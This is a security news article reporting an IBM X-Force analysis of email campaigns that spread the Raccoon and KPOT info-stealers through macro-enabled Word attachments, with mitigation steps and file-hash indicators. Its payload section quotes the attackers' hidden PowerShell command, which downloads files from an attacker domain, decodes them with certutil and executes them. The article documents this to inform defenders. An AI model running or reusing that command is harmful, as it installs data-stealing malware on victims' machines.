Thursday, October 3, 2024
HomeMalwareHackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Hackers Attack Windows Users with Info-Stealer Malware via Weaponized MS Word Documents

Published on

Researchers from X-Force uncovered a malicious campaign with Info-stealer called “Raccoon” and “KPOT” that targets the Windows Users via fake emails to steal sensitive data.

Raccoon malware believed to be originated from the Russian speaking hackers and it has actively attacked financial and government organizations last year with Fallout & RIG Exploit Kits.

Type of Attempts to infect the Windows Users

This malware campaign delivers the payload via email that contains a weaponized document which is signed using the DocuSign software, DocuSign is a company well known for enabling organizations to manage electronic documents.

- Advertisement - EHA
Info-Stealer

Document subject is referred to as “files” or “paperwork” a tempt victims to open a file, and execute the payload in the victim’s windows machine.

Another sextortion fallout email sample that collected by the researchers has contains the following body content and claim themselves as “the Red Skull hacker crew”:

“Private info belonging to your friend has been stolen”, “Your colleague’s account was compromised” or “We have got access to your friend’s account”.

Also, the attacker sends an intimate picture of his girlfriend and threatened the person to distribute the picture to his complete contact list if the victims not paying the demanded ransom of 500 dollars.

A very recent sample that uncovered by the researchers from IBM X-Force, posing as an official “indictment message” sent by the court. This is supposed to frighten victims into believing that they are actually sued in court for something they do not know of. 

The body of the email urging the victims to examine and print out the documents and also giving a deadline for a response and explaining the consequences if the victims failed to open the malicious document.

Info-Stealer

These are the main attempts of tempting victims to open the attachment to executing the malware payload by the attacker.

Payload

Once open the malicious document, it keeps urging users to click the “Enable content ” that helps them to execute the macro on the Windows machine.

All emails contain exactly the same macro content. as soon as the macros are run, a PowerShell command is executed in the background.

powershell -windowstyle hidden Import-Module BitsTransfer; Start-BitsTransfer -Source http://corp6.site/IeuAje.dat,http://corp6.site/neaJk.dat,http://corp6.site/QpYe.dat -Destination "$env:TEMP\vido.com","$env:TEMP\sfera","$env:TEMP\QpYe.com"; Set-Location -Path "$env:TEMP"; certutil -decode sfera tref;  Start-Process vido.com -ArgumentList tref

The above command will download the Raccoon info stealer hosted on corp6[.]site.

In the recent campaign deliver the KPOT and another info-stealer via new hardcoded URLs.

It is worth mentioning, that we have seen info stealing malware distributed comparably on the domains corp5[.]site, corp6[.]site and now corp7[.]site. Researchers said.

Mitigation

1. Do not click or open links in emails directly, instead type in the main URL in your browser or search the brand/company via your preferred search engine.

2. Ensure anti-virus software and associated files are up to date.

3. Search for existing signs of the indicated IOCs in your environment.

4. Block all URL and IP based IOCs at the firewall, IDS, web gateways, routers or other perimeter-based devices, a course of action, resources or applications to remediate this threat.

5. Keep applications and operating systems running at the current released patch level.

IOC’s

40EB933C1538165C0E777BE5DCB38F91
7DD258C510A6B9EA4FBA30D4AFF0A9D4
B403F98DA4F2E15F9F3B516A589575C5

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Northern Ireland Police to Pay £750,000 Fine Following Data Breach

The Police Service of Northern Ireland (PSNI) has been ordered to pay a £750,000...

ANY.RUN Upgrades Threat Intelligence to Identify Emerging Threats

ANY.RUN announced an upgrade to its Threat Intelligence Portal, enhancing its capabilities to identify...

Cisco Nexus Vulnerability Let Hackers Execute Arbitrary Commands on Vulnerable Systems

A critical vulnerability has been discovered in Cisco's Nexus Dashboard Fabric Controller (NDFC), potentially...

Hackers Now Exploit Ivanti Endpoint Manager Vulnerability to Launch Cyber Attacks

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the addition of a new...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

DCRAt Attacking Users Via HTML Smuggling To Steal Login Credentials

In a new campaign that is aimed at users who speak Russian, the modular...

LummaC2 Stealer Leverages Customized Control Flow Indirection For Execution

The LummaC2 obfuscator employs a novel control flow protection scheme designed specifically for its...

Octo2 Android Malware Attacking To Steal Banking Credentials

The original threat actor behind the Octo malware family has released a new variant,...